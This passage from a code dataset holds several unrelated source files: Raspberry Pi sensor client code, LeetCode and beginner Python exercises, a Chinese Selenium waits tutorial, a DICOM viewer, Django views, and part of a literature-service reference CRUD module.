will fail.\n\n :returns: Flag indicating whether the buzzer is currently beeping.\n :rtype: bool\n \"\"\"\n return self._is_dark\n\n def light_change(self, portnr=1000):\n \"\"\"is called by the edge detection and running in a new thread\n calls the _press() method which performs the action triggered by the button \"\"\"\n self.log.info('GPIO edge callback on thread {thread_id}', thread_id=current_thread().ident)\n reactor.callFromThread(self._light_change)\n\n @inlineCallbacks\n def _light_change(self):\n \"\"\"light sensor edge event handler\"\"\"\n\n self.log.info('Light sensor edge event handler on thread {thread_id}', thread_id=current_thread().ident)\n\n self._is_dark = GPIO.input(self._light_sensor_pin)\n self.log.info(\"GPIO\", self._is_dark)\n\n # \"\"\" publish current state\"\"\"\n # if self._is_dark:\n # self.publish(u'{}.is_hot'.format(self._prefix))\n # self.log.info(\"is hot\")\n # # \"\"\"wait for a short time\"\"\"\n # yield sleep(1 / 1000.)\n # else:\n # self.publish(u'{}.is_cold'.format(self._prefix))\n # self.log.info(\"is cold\")\n # yield sleep(1 / 1000.)\n\n def onLeave(self, details):\n self.log.info(\"session closed: {details}\", details=details)\n self.disconnect()\n GPIO.output(self._light_sensor_pin, GPIO.LOW)\n GPIO.cleanup()\n\n def onDisconnect(self):\n self.log.info(\"connection closed\")\n try:\n reactor.stop()\n except ReactorNotRunning:\n pass\n\n\nif __name__ == '__main__':\n\n # Crossbar.io connection configuration\n\n url = os.environ.get('CBURL', u'wss://demo.crossbar.io/ws')\n realm = os.environ.get('CBREALM', u'crossbardemo')\n\n # parse command line parameters\n parser = argparse.ArgumentParser()\n parser.add_argument('-d', '--debug', action='store_true', help='Enable debug output.')\n parser.add_argument('--url', dest='url', type=six.text_type, default=url, help='The router URL (default: \"ws://localhost:8080/ws\").')\n parser.add_argument('--realm', dest='realm', type=six.text_type, default=realm, help='The realm to join (default: \"realm1\").')\n\n args = parser.parse_args()\n\n if args.debug:\n txaio.start_logging(level='debug')\n else:\n txaio.start_logging(level='info')\n\n # custom configuration data\n extra = {\n # GPI pin of buzzer\n u'light_sensor_pin': 14,\n }\n\n # create and start app runner for our app component ..\n runner = ApplicationRunner(url=args.url, realm=args.realm, extra=extra)\n runner.run(LightSensorComponent, auto_reconnect=True)\n","sub_path":"device/pi/components/_work/temperature_sensor/app/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"175805176","text":"class Solution(object):\n def findPaths(self, m, n, N, i, j):\n res = [0]\n self.bfs(res, m, n, N, i, j)\n return res[0]\n\n def bfs(self, res, m, n, N, i, j):\n if i < 0 or j < 0 or i == m or j == n:\n res[0] += 1\n return\n if N == 0:\n return\n self.bfs(res, m, n, N - 1, i + 1, j)\n self.bfs(res, m, n, N - 1, i - 1, j)\n self.bfs(res, m, n, N - 1, i, j + 1)\n self.bfs(res, m, n, N - 1, i, j - 1)\n\n# Solution 2\n\n def findPaths(self, m, n, N, i, j):\n if N <= 0: return 0\n count = [[0 for k in range(n)] for l in range(m)]\n count[i][j] = 1\n res = 0\n dirs = [[1,0],[-1,0],[0,1],[0,-1]]\n \n for step in range(N):\n temp = [[0 for i in range(n)] for j in range(m)]\n for r in range(m):\n for c in range(n):\n for p in dirs:\n nr = r + p[0]\n nc = c + p[1]\n if nr < 0 or nc < 0 or nr >= m or nc >= n:\n res = (res + count[r][c]) % (10**9 + 7)\n else:\n temp[nr][nc] = (temp[nr][nc] + count[r][c]) % (10**9 + 7)\n count = temp\n return res","sub_path":"LC/576_Out_of_Boundary_Paths.py","file_name":"576_Out_of_Boundary_Paths.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"56067407","text":"'''\n@author:lvming\n@time:2021/6/23\n'''\nfrom time import sleep\n\nfrom selenium.webdriver.support.wait import WebDriverWait\n\n'''\n课程回顾:\n 1.常规元素操作,iframe和句柄的切换。\n 2.注册电商系统账号,实现自动化注册与登录流程。\n\t作业问题:\n\t 1.很多同学,听了课和没听课是一样的\n\t 2.copy xpath会有问题的。\n\t 3.By对象实现元素定位有问题嘛?\n\t 4.数据分离文件。所有被分离的元素在定义和声明的时候是常量。常量是大写的。不是小写的。\n\t 5.断言。有点勉强,在UI的阶段下断言只是为了校验最后的结果。\n'''\n# 等待的用途:\n# 自动化测试是基于机器来实现的测试行为,本质意义上还是点点点的行为操作。在运行测试的代码时经常会因为代码的问题导致运行时失败。\n# 自动化测试首先要求的是成功率,也就是稳定性。\n# 自动化测试流程的稳定性需要通过等待来保障。代码不需要考虑运行时间,但是代码运行的对象要考虑时间。\n\n# 三类等待:\n'''\n# 1.强制等待\n 不考虑整体代码的连贯性和逻辑性,运行到强制等待时,就直接停止指定的时间,时间结束后,再继续运行后面的代码\n sleep表示强制等待,以秒为时间单位,是在time包下的类\n 优势:容易上手。有需要的时候直接调用即可。对于新手特别友好\n 劣势:迟钝。在自动化执行时会造成大量的时间浪费。\n 一般而言都是新手在使用sleep,或者是临时性的调试应用。或者特定情况。\n# 2.隐式等待\n 悄悄的等待。本质意义上而言是driver的一个设置项。\n 只需要设置一次,即可在driver的整个生命周期中生效\n 隐式等待的时间也是基于秒来进行等待的。但是隐式等待会在找到元素后直接结束\n 如果没有找到元素,就会等到设置的最大时间,等待的过程中一直会寻找这个元素\n 如果最终没有找到元素,就继续运行下一行代码。\n 隐式等待必须要等待页面加载完成之后再生效。所以效率的提升不是太明显。\n 没有办法指定到元素来进行等待。\n 一般而言隐式等待都会添加。添加的时间一般是5秒或者10秒\n 优势:在整个webdriver声明周期中,只需要设置一次即可。\n# 3.显式等待\n 专门针对元素来进行等待的。\n 和强制等待一样,在需要调用的时候就要定义。\n 显式等待分为until和until_not两种函数来实现等待,作用是完全相反的\n 如果元素未找到,会抛出timeout的异常。\n 显式等待在执行的时候会有一个return.返回等待的元素\n 优势:可以直接对单个元素进行等待,效率最高。\n 劣势:代码太长了,用起来比较麻烦。\n 显式等待还可以当做断言的形式来使用。\n在实际的自动化测试中,等待是综合运用的。\n当显示与隐式同时存在的时候:\n\t1.如果显示等待的元素找不到,则抛出超时异常。\n\t2.基于两者等待机制的时间设定,默认遵循时间更长的等待。\n弹窗机制:\n\t很久没用过了。现在的系统很少有了。因为所有的弹窗交互都是基于div层直接实现。\n\t所有形式的弹窗不是页面弹出,二十浏览器弹出。\n\t在浏览器中有三类弹窗:\n\t 1.alert:确认\n\t 2.prompt:支持输入并确定\n\t 3.confirm:确定与 取消\n\t 如果弹窗的样式与操作系统或者浏览器一个风格,则一定是alert\n 如果弹窗的样式与软件系统一个风格,一般都是div层,只需要考虑是否存在iframe即可\n'''\n\nfrom selenium import webdriver\n\ndriver = webdriver.Chrome()\n# 隐式等待\ndriver.implicitly_wait(10)\ndriver.maximize_window()\ndriver.get('http://www.baidu.com')\ndriver.find_element('id','kw').send_keys('虚竹')\ndriver.find_element('id','su').click()\n# 强制等待\n# sleep(2)\n# 显式等待\nel = WebDriverWait(driver,5,0.5).until(\n lambda el1:driver.find_element('xpath','//*[@id=\"1\"]/h3/a'),\n message='元素查找失败')\nel.click()\n# WebDriverWait(driver,5,0.5).until_not(\n# lambda el:driver.find_element('xpath','//*[@id=\"1\"]/h3/a'),\n# message='元素查找失败')\n# driver.find_element('xpath','//*[@id=\"1\"]/h3/a').click()\n# driver.find_element('xpath','//*[@id=\"1\"]/h3/a').click()\nprint('这是a1元素后的代码')\ndriver.quit()\n\n#alert弹窗处理\nalert = driver.switch_to.alert()\nalert.accept()\n#confirm弹窗处理\nalert.accept()\nalert.dismiss()\n#prompt\nalert.sendkeys()\nalert.accept()\nalert.dismiss()\n#获取alert弹窗的文本\nalert = alert.text\n# 课后作业:\n# 通过自动化测试行为,实现电商的下单流程。\n# \t登录-搜索商品-添加商品属性-加入购��车-校验购物车是否添加成功\n# iphone6\n","sub_path":"web01/selenium05.py","file_name":"selenium05.py","file_ext":"py","file_size_in_byte":4903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"305471574","text":"lista = []\npares = []\nimpares = []\nwhile True:\n n = int(input('Enter a number[0 to exit]: '))\n if n == 0:\n break\n else:\n lista.append(n)\nfor c in lista:\n if c % 2 == 0:\n pares.append(c)\n else:\n impares.append(c)\nprint(f'Odd: {impares}')\nprint(f'Even: {pares}')\nprint(f'All: {lista}')\n","sub_path":"exercicosPython/exercises/ex001_114/ex082evenOdds.py","file_name":"ex082evenOdds.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"148143006","text":"u_input= [0,1,2,3,4,5]\nprint(u_input)\nno_left_shifts = int(raw_input('\\nEnter number of left shifts\\n'))\nlength_array = len(u_input)\n\nnew_list = []\n\nfor i,v in enumerate(u_input):\n new_index = (i + no_left_shifts) % length_array\n new_list.append(u_input[new_index])\n\nprint(new_list)\n","sub_path":"Documents/Dev/Projects/CrackingCodingIn/shiftIndex.py","file_name":"shiftIndex.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"399156568","text":"import os\nimport numpy as np \nimport matplotlib.pyplot as plt\nimport pydicom\nimport sys \nimport argparse\n\ndef usage():\n print (\" -d directory of the dicom folder | -h help\")\n\ndef readDirectory(path):\n\n ''' This Method Reads the directory and returns a list of Dicom files'''\n imageSet = []\n\n #Read the the files ends with .dcm extension\n for filename in os.listdir(path):\n if filename.endswith('.dcm'):\n imgPath=os.path.join(path, filename)\n imageSet.append(pydicom.dcmread(imgPath))\n return imageSet\n\ndef displayThumbnils(imageSet):\n '''This method takes a List of dicom image and shows them in a thumbnil fashion'''\n\n # Define the grid size of the viewing \n height=np.ceil(np.sqrt(len(imageSet))).astype(int)\n width=len(imageSet)/height + 1\n\n \n #Define the size each individule figure in the grid\n fig=plt.figure(figsize=(15,15))\n\n #Go through all the files and put them in the figure \n for (idx,data) in enumerate(imageSet):\n fig.add_subplot(height,width,idx+1)\n plt.axis('off')\n plt.imshow(data.pixel_array , cmap=plt.cm.bone)\n plt.show()\n \n\nif __name__ == \"__main__\":\n #path='C:\\\\Users\\\\Niaz\\\\OneDrive\\\\Study Materials\\\\UBx\\\\New folder\\\\CT2.55\\\\'\n parser=argparse.ArgumentParser()\n parser.add_argument(\"-d\",\"--dir\", help=\"Please Enter the Dicom Directory in following format -d directory \\n\" )\n \n # Read arguments from the command line\n args = parser.parse_args()\n\n if args.dir:\n dicomList=readDirectory(args.dir)\n displayThumbnils(dicomList)\n else:\n usage()\n sys.exit(2)\n","sub_path":"displayThumbnil.py","file_name":"displayThumbnil.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"244819678","text":"import json as js\n\n\ndef count(path):\n \"\"\"\n 统计json格式推荐结果,打印到console\n :param path: 路径\n :return: \n \"\"\"\n with open(path+'recommend_list') as f:\n n = 0\n line = f.readline()\n full_count={}\n full_count['relation']=0\n full_count['movie']=0\n full_count['show']=0\n while line:\n if line != None:\n n+=1\n item = js.loads(line)\n for k,v in item.items():\n for i in v:\n for k2,v2 in i.items():\n full_count[k2]=full_count[k2]+len(v2)\n line=f.readline()\n with open(path+'recommend_count','a',encoding='utf-8') as f5:\n data = js.dumps(full_count)\n f5.write('推荐关系量:'+str(n)+data+'\\n')\n print(n, full_count)\n","sub_path":"count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"80539407","text":"# Inez Fennelly 7th March 2018\r\n# Fizz Buzz https://en.wikipedia.org/wiki/Fizz_buzz\r\n\r\ni = 1\r\n\r\nwhile i <= 30:\r\n if (i % 3 == 0) and (i % 5 == 0):\r\n print (\"Fizz Buzz\")\r\n elif i % 3 == 0:\r\n print (\"Fizz\")\r\n elif i % 5 == 0:\r\n print (\"Buzz\")\r\n else:\r\n print (i)\r\n i = i + 1\r\n","sub_path":"FizzBuss.py","file_name":"FizzBuss.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"319821132","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\n\nfrom .models import Name,Therapy\nfrom .forms import NameForm,TherapyForm\n\n\ndef diseases(request):\n names=Name.objects.all()\n context={'names':names}\n return render(request,'Disease/diseases.html',context)\n\n\ndef new_disease(request):\n if request.method=='GET':\n form=NameForm()\n else:\n form=NameForm(request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('Disease:diseases'))\n\n context={'form':form}\n return render(request,'Disease/new_disease.html',context)\n\n\ndef illness(request,disease_id):\n disease=Name.objects.get(id=disease_id)\n therapys=disease.therapy_set.order_by('-date_added')\n context={'disease':disease,'therapys':therapys}\n return render(request,'Disease/illness.html',context)\n\n\ndef edit_therapy(request,therapy_id):\n therapy=Therapy.objects.get(id=therapy_id)\n name=therapy.name\n if request.method!='POST':\n form=TherapyForm(instance=therapy)\n else:\n form=TherapyForm(instance=therapy, data=request.POST)\n if form.is_valid():\n form.save()\n return HttpResponseRedirect(reverse('Disease:illness',\n args=[name.id]))\n\n context={'therapy':therapy,'name':name,'form':form}\n return render(request,'Disease/edit_therapy.html',context)\n\ndef new_therapy(request,name_id):\n name=Name.objects.get(id=name_id)\n\n if request.method!='POST':\n form=TherapyForm()\n else:\n form=TherapyForm(request.POST)\n new_therapy=form.save(commit=False)\n new_therapy.name=name\n new_therapy.save()\n return HttpResponseRedirect(reverse('Disease:illness',args=[name.id]))\n\n context={'name':name,'form':form}\n return render(request,'Disease/new_therapy.html',context)\n\ndef delete_name(request,name_id):\n name=Name.objects.get(id=name_id)\n name.delete()\n return HttpResponseRedirect(reverse('Disease:diseases'))\n","sub_path":"BreedingSite/Disease/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"397093121","text":"data = int(input())\nsugar = [(data//3)+1, (data//5)+1]\n\ncount = sugar[0] + sugar[1]\nflag = True\n\nfor i in range(sugar[0]):\n for j in range(sugar[1],-1,-1):\n if 3*i + 5*j == data:\n count = min(i+j,count)\n flag = False\n\n else:\n continue\n\nif flag:\n print(-1)\n\nelse:\n print(count)\n\n","sub_path":"PS/baekjoon/단계별로 풀어보기/b_2839_설탕배달.py","file_name":"b_2839_설탕배달.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"258158284","text":"\"\"\"\nreference_crud.py\n=================\n\"\"\"\nimport logging\nimport re\nfrom datetime import datetime\nfrom typing import Any, Dict, List\n\nfrom fastapi import HTTPException, status\nfrom fastapi.encoders import jsonable_encoder\nfrom sqlalchemy import ARRAY, Boolean, String, func\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.sql.expression import cast, or_\n\nfrom agr_literature_service.api.crud import (cross_reference_crud,\n reference_comment_and_correction_crud)\nfrom agr_literature_service.api.crud.cross_reference_crud import set_curie_prefix\nfrom agr_literature_service.api.crud.mod_reference_type_crud import insert_mod_reference_type_into_db\nfrom agr_literature_service.api.crud.reference_resource import create_obj\nfrom agr_literature_service.api.crud.reference_utils import get_reference\nfrom agr_literature_service.api.models import (AuthorModel, CrossReferenceModel,\n MeshDetailModel,\n ObsoleteReferenceModel,\n ReferenceCommentAndCorrectionModel,\n ReferenceModel,\n ResourceModel,\n CopyrightLicenseModel,\n CitationModel)\nfrom agr_literature_service.api.schemas import ReferenceSchemaPost, ModReferenceTypeSchemaRelated\nfrom agr_literature_service.api.crud.mod_corpus_association_crud import create as create_mod_corpus_association\nfrom agr_literature_service.api.crud.workflow_tag_crud import (\n create as create_workflow_tag,\n patch as update_workflow_tag,\n show as show_workflow_tag\n)\nfrom agr_literature_service.api.crud.topic_entity_tag_crud import (\n patch as update_topic_entity_tag,\n create as create_topic_entity_tag\n)\nfrom agr_literature_service.global_utils import get_next_reference_curie\nfrom agr_literature_service.api.crud.referencefile_crud import destroy as destroy_referencefile\n\nlogger = logging.getLogger(__name__)\n\n\ndef create(db: Session, reference: ReferenceSchemaPost): # noqa\n \"\"\"\n\n :param db:\n :param reference:\n :return:\n \"\"\"\n\n logger.debug(\"creating reference\")\n logger.debug(reference)\n add_separately_fields = [\"mod_corpus_associations\", \"workflow_tags\", \"topic_entity_tags\", \"mod_reference_types\"]\n list_fields = [\"authors\", \"tags\", \"mesh_terms\", \"cross_references\"]\n remap = {'authors': 'author',\n 'mesh_terms': 'mesh_term',\n 'cross_references': 'cross_reference',\n 'mod_reference_types': 'mod_reference_type'}\n reference_data = {} # type: Dict[str, Any]\n author_names_order = []\n\n if reference.cross_references:\n for cross_reference in reference.cross_references:\n if db.query(CrossReferenceModel).filter(CrossReferenceModel.curie == cross_reference.curie).first():\n raise HTTPException(status_code=status.HTTP_409_CONFLICT,\n detail=f\"CrossReference with id {cross_reference.curie} already exists\")\n logger.debug(\"done x ref\")\n curie = get_next_reference_curie(db)\n reference_data[\"curie\"] = curie\n\n for field, value in vars(reference).items():\n if value is None:\n continue\n logger.debug(\"processing {field} {value}\")\n if field in list_fields:\n db_objs = []\n for obj in value:\n obj_data = jsonable_encoder(obj)\n db_obj = None\n if field in [\"authors\"]:\n db_obj = create_obj(db, AuthorModel, obj_data, non_fatal=True)\n if db_obj.name:\n author_names_order.append((db_obj.name, db_obj.order))\n elif field == \"mesh_terms\":\n db_obj = MeshDetailModel(**obj_data)\n elif field == \"cross_references\":\n db_obj = CrossReferenceModel(**obj_data)\n set_curie_prefix(db_obj)\n db.add(db_obj)\n db_objs.append(db_obj)\n if field in remap:\n reference_data[remap[field]] = db_objs\n else:\n reference_data[field] = db_objs\n elif field == \"resource\":\n resource = db.query(ResourceModel).filter(ResourceModel.curie == value).first()\n if not resource:\n raise HTTPException(status_code=status.HTTP_422_UNPROCESSABLE_ENTITY,\n detail=f\"Resource with curie {value} does not exist\")\n reference_data[\"resource\"] = resource\n elif field == \"merged_into_reference_curie\":\n merged_into_obj = db.query(ReferenceModel).filter(ReferenceModel.curie == value).first()\n if not merged_into_obj:\n raise HTTPException(status_code=status.HTTP_422_UNPROCESSABLE_ENTITY,\n detail=f\"Merged_into Reference with curie {value} does not exist\")\n reference_data[\"merged_into_reference\"] = merged_into_obj\n elif field in add_separately_fields:\n continue\n else:\n reference_data[field] = value\n logger.debug(\"finished processing {} {}\".format(field, value))\n\n logger.debug(\"add reference\")\n # reference_data['citation'] = citation_from_data(reference_data,\n # \"; \".join([x[0] for x in sorted(author_names_order,\n # key=lambda x: x[1])]))\n reference_db_obj = ReferenceModel(**reference_data)\n logger.debug(\"have model, save to db\")\n db.add(reference_db_obj)\n logger.debug(\"saved\")\n db.commit()\n db.refresh(reference_db_obj)\n for field, value in vars(reference).items():\n logger.debug(\"Processing mod corpus asso\")\n if field == \"mod_corpus_associations\":\n if value is not None:\n for obj in value:\n obj_data = jsonable_encoder(obj)\n obj_data[\"reference_curie\"] = curie\n try:\n create_mod_corpus_association(db, obj_data)\n except HTTPException:\n logger.warning(\"skipping mod corpus association to a mod that is already associated to \"\n \"the reference\")\n elif field == \"workflow_tags\":\n if value is not None:\n for obj in value:\n obj_data = jsonable_encoder(obj)\n obj_data[\"reference_curie\"] = curie\n try:\n if \"reference_workflow_tag_id\" in obj_data and obj_data[\"reference_workflow_tag_id\"]:\n update_workflow_tag(db, obj_data[\"reference_workflow_tag_id\"], obj_data)\n else:\n create_workflow_tag(db, obj_data)\n except HTTPException:\n logger.warning(\"skipping workflow_tag to a mod that is already associated to \"\n \"the reference\")\n elif field == \"topic_entity_tags\":\n if value is not None:\n for obj in value:\n obj_data = jsonable_encoder(obj)\n obj_data[\"reference_curie\"] = curie\n try:\n if \"reference_topic_entity_tag_id\" in obj_data and obj_data[\"reference_topic_entity_tag_id\"]:\n update_topic_entity_tag(db, obj_data[\"reference_topic_entity_tag_id\"], obj_data)\n else:\n create_topic_entity_tag(db, obj_data)\n except HTTPException:\n logger.warning(\"skipping topic_entity_tag as that is already associated to \"\n \"the reference\")\n elif field == \"mod_reference_types\":\n for obj in value or []:\n insert_mod_reference_type_into_db(db, reference.pubmed_types, obj.source, obj.reference_type,\n reference_db_obj.reference_id)\n return curie\n\n\ndef destroy(db: Session, curie_or_reference_id: str):\n \"\"\"\n\n :param db:\n :param curie_or_reference_id:\n :return:\n \"\"\"\n reference_id = int(curie_or_reference_id) if curie_or_reference_id.isdigit() else None\n reference = db.query(ReferenceModel).filter(or_(\n ReferenceModel.curie == curie_or_reference_id,\n ReferenceModel.reference_id == reference_id)).one_or_none()\n\n if not reference:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Reference with curie or reference_id {curie_or_reference_id} not found\")\n for referencefile in reference.referencefiles:\n destroy_referencefile(db, referencefile.referencefile_id)\n db.delete(reference)\n db.commit()\n\n return None\n\n\ndef patch(db: Session, curie_or_reference_id: str, reference_update) -> dict:\n \"\"\"\n\n :param db:\n :param curie_or_reference_id:\n :param reference_update:\n :return:\n \"\"\"\n\n reference_data = jsonable_encoder(reference_update)\n logger.debug(\"reference_data = {}\".format(reference_data))\n reference_id = int(curie_or_reference_id) if curie_or_reference_id.isdigit() else None\n reference_db_obj = db.query(ReferenceModel).filter(or_(\n ReferenceModel.curie == curie_or_reference_id,\n ReferenceModel.reference_id == reference_id)).one_or_none()\n\n if not reference_db_obj:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Reference with curie or reference_id {curie_or_reference_id} not found\")\n\n for field, value in reference_data.items():\n if field == \"resource\" and value:\n resource_curie = value\n resource = db.query(ResourceModel).filter(ResourceModel.curie == resource_curie).first()\n if not resource:\n raise HTTPException(status_code=status.HTTP_422_UNPROCESSABLE_ENTITY,\n detail=f\"Resource with curie {resource_curie} does not exist\")\n reference_db_obj.resource = resource\n else:\n setattr(reference_db_obj, field, value)\n\n # currently do not update citation on patches. code will call update_citation separately when all done\n # reference_db_obj.citation = get_citation_from_obj(db, reference_db_obj)\n reference_db_obj.dateUpdated = datetime.utcnow()\n db.commit()\n\n return {\"message\": \"updated\"}\n\n\ndef show_all_references_external_ids(db: Session):\n \"\"\"\n\n :param db:\n :return:\n \"\"\"\n\n references_query = db.query(ReferenceModel.curie,\n cast(func.array_agg(CrossReferenceModel.curie),\n ARRAY(String)),\n cast(func.array_agg(CrossReferenceModel.is_obsolete),\n ARRAY(Boolean))) \\\n .outerjoin(ReferenceModel.cross_reference) \\\n .group_by(ReferenceModel.curie)\n\n return [{\"curie\": reference[0],\n \"cross_references\": [{\"curie\": reference[1][idx],\n \"is_obsolete\": reference[2][idx]}\n for idx in range(len(reference[1]))]}\n for reference in references_query.all()]\n\n\ndef show(db: Session, curie_or_reference_id: str): # noqa\n \"\"\"\n\n :param db:\n :param curie_or_reference_id:\n :param http_request:\n :return:\n \"\"\"\n reference = get_reference(db, curie_or_reference_id, load_authors=True, load_mod_corpus_associations=True,\n load_mesh_terms=True, load_obsolete_references=True)\n reference_data = jsonable_encoder(reference)\n if reference.resource_id:\n reference_data[\"resource_curie\"] = \\\n db.query(ResourceModel.curie).filter(ResourceModel.resource_id == reference.resource_id).first()[0]\n reference_data[\"resource_title\"] = \\\n db.query(ResourceModel.title).filter(ResourceModel.resource_id == reference.resource_id).first()[0]\n\n if reference.copyright_license_id:\n crl = db.query(CopyrightLicenseModel).filter_by(\n copyright_license_id=reference.copyright_license_id).one_or_none()\n if crl:\n reference_data[\"copyright_license_name\"] = crl.name\n reference_data[\"copyright_license_url\"] = crl.url\n reference_data[\"copyright_license_description\"] = crl.description\n reference_data[\"copyright_license_open_access\"] = crl.open_access\n\n if reference.citation_id:\n cit = db.query(CitationModel).filter_by(\n citation_id=reference.citation_id).one_or_none()\n if cit:\n reference_data[\"citation\"] = cit.citation\n reference_data[\"citation_short\"] = cit.short_citation\n else:\n logger.warning(f\"ref: {reference} has no citation, id is {reference.citation_id}\")\n reference_data[\"citation\"] = f'No citation lookup failed for ref:{reference.curie} cit_id:{reference.citation_id}'\n reference_data[\"citation_short\"] = 'Problem No short citation'\n else:\n reference_data[\"citation\"] = f'No citation_id for ref:{reference.curie}'\n reference_data[\"citation_short\"] = f'No citation_id for ref:{reference.curie}'\n\n bad_cross_ref_ids = []\n if reference.cross_reference:\n cross_references = []\n for cross_reference in reference.cross_reference:\n cross_reference_show = jsonable_encoder(cross_reference_crud.show(db, cross_reference.curie))\n del cross_reference_show[\"reference_curie\"]\n cross_references.append(cross_reference_show)\n reference_data[\"cross_references\"] = cross_references\n for x in cross_references:\n pieces = x['curie'].split(\":\")\n if len(pieces) > 2 and pieces[0] != 'DOI':\n ## will pick up something like 'FB:FB:FBrf0221304'\n bad_cross_ref_ids.append(x['curie'])\n elif pieces[1] == \"\":\n ## will pick up something like 'FB:'\n bad_cross_ref_ids.append(x['curie'])\n reference_data[\"invalid_cross_reference_ids\"] = bad_cross_ref_ids\n\n if reference.mod_referencetypes:\n reference_data[\"mod_reference_types\"] = []\n for ref_mod_referencetype in reference.mod_referencetypes:\n reference_data[\"mod_reference_types\"].append(\n jsonable_encoder(ModReferenceTypeSchemaRelated(\n mod_reference_type_id=ref_mod_referencetype.reference_mod_referencetype_id,\n reference_type=ref_mod_referencetype.mod_referencetype.referencetype.label,\n source=ref_mod_referencetype.mod_referencetype.mod.abbreviation)))\n reference_data[\"obsolete_references\"] = [obs_reference[\"curie\"] for obs_reference in\n reference_data[\"obsolete_reference\"]]\n del reference_data[\"obsolete_reference\"]\n\n # So thisis wierd, we check reference.mod_corpus_association BUT\n # use reference_data[\"mod_corpus_association\"]\n if reference.mod_corpus_association:\n for i in range(len(reference_data[\"mod_corpus_association\"])):\n del reference_data[\"mod_corpus_association\"][i][\"reference_id\"]\n reference_data[\"mod_corpus_association\"][i][\"mod_abbreviation\"] = reference_data[\n \"mod_corpus_association\"][i][\"mod\"][\"abbreviation\"]\n del reference_data[\"mod_corpus_association\"][i][\"mod\"]\n del reference_data[\"mod_corpus_association\"][i][\"mod_id\"]\n reference_data[\"mod_corpus_associations\"] = reference_data[\"mod_corpus_association\"]\n del reference_data[\"mod_corpus_association\"]\n\n reference_data['workflow_tags'] = []\n if reference.workflow_tag:\n for ont in reference.workflow_tag:\n ont_json = show_workflow_tag(db, ont.reference_workflow_tag_id)\n\n reference_data[\"workflow_tags\"].append(ont_json)\n\n if reference.mesh_term:\n for mesh_term in reference_data[\"mesh_term\"]:\n del mesh_term[\"reference_id\"]\n reference_data['mesh_terms'] = reference_data['mesh_term']\n\n if reference.author:\n authors = []\n for author in reference_data[\"author\"]:\n del author[\"reference_id\"]\n authors.append(author)\n reference_data['authors'] = authors\n del reference_data['author']\n\n comment_and_corrections_data = {\"to_references\": [], \"from_references\": []} # type: Dict[str, List[str]]\n for comment_and_correction in reference.comment_and_corrections_out:\n comment_and_correction_data = reference_comment_and_correction_crud.show(db,\n comment_and_correction.reference_comment_and_correction_id)\n del comment_and_correction_data[\"reference_curie_from\"]\n comment_and_corrections_data[\"to_references\"].append(comment_and_correction_data)\n for comment_and_correction in reference.comment_and_corrections_in:\n comment_and_correction_data = reference_comment_and_correction_crud.show(db,\n comment_and_correction.reference_comment_and_correction_id)\n del comment_and_correction_data[\"reference_curie_to\"]\n comment_and_corrections_data[\"from_references\"].append(comment_and_correction_data)\n\n reference_data[\"comment_and_corrections\"] = comment_and_corrections_data\n logger.debug(\"returning {}\".format(reference_data))\n return reference_data\n\n\ndef show_changesets(db: Session, curie_or_reference_id: str):\n \"\"\"\n\n :param db:\n :param curie_or_reference_id:\n :return:\n \"\"\"\n reference_id = int(curie_or_reference_id) if curie_or_reference_id.isdigit() else None\n reference = db.query(ReferenceModel).filter(or_(\n ReferenceModel.curie == curie_or_reference_id, ReferenceModel.reference_id == reference_id)).one_or_none()\n if not reference:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Reference with the reference id or curie {curie_or_reference_id} is not available\")\n history = []\n for version in reference.versions:\n tx = version.transaction\n history.append({\"transaction\": {\"id\": tx.id,\n \"issued_at\": tx.issued_at,\n \"user_id\": tx.user_id},\n \"changeset\": version.changeset})\n\n return history\n\n\ndef merge_references(db: Session,\n old_curie: str,\n new_curie: str):\n \"\"\"\n :param db:\n :param old_curie:\n :param new_curie:\n :return:\n\n Add merge details to obsolete_reference_curie table.\n Then delete old_curie.\n \"\"\"\n\n # Lookup both curies\n old_ref = db.query(ReferenceModel).filter(ReferenceModel.curie == old_curie).first()\n new_ref = db.query(ReferenceModel).filter(ReferenceModel.curie == new_curie).first()\n\n merge_comments_and_corrections(db, old_ref.reference_id, new_ref.reference_id,\n old_curie, new_curie)\n\n # Check if old_curie is already in the obsolete table (It may have been merged itself)\n # by looking for it in the new_id column.\n # If so then we also want to update that to the new_id.\n prev_obs_ref_cur = db.query(ObsoleteReferenceModel).filter(\n ObsoleteReferenceModel.new_id == old_ref.reference_id).all()\n for old in prev_obs_ref_cur:\n old.new_id = new_ref.reference_id\n obs_ref_cur_data = {'new_id': new_ref.reference_id,\n 'curie': old_ref.curie}\n # Add old_curie and new_id into the obsolete_reference_curie table.\n obs_ref_cur_db_obj = ObsoleteReferenceModel(**obs_ref_cur_data)\n db.add(obs_ref_cur_db_obj)\n # Commit remapping in obsolete_reference_curie to avoid deleting them when deleting old_ref\n db.commit()\n\n # Delete the old_curie object\n 